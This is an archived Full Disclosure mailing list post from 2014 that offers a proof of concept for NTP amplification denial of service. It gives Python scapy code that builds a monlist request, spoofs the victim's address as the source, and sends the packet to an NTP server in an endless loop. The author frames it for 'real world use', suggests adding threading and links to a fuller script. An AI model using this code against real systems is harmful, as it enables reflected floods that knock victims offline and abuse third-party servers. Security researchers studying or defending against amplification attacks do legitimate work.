Full Disclosure mailing list archives

A more robust POC for the ntp amplification dos

From: rai () openmailbox org
Date: Wed, 16 Jul 2014 09:20:00 +0000

Hi,

Even though, the ntp amplification attacks are old, and there are
plenty of scripts for checking if vulnerable (eg. the nmap nse script
ntp-mon), I had trouble finding a good example script that actually
exploited the vuln as would be done in the wild.

Eventually I edited a partially written script written by multiple
authors. Since it is in python, and uses scapy the key part exploit is
as simple as:

data = "\x17\x00\x03\x2a" + "\x00" * 4
...

packet =IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data)

send(packet,loop=1)

For real world use, just add some boilerplate threading to taste:

http://maker.fea.st/ntpamp.py

--
rai

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread:

A more robust POC for the ntp amplification dos rai (Jul 16)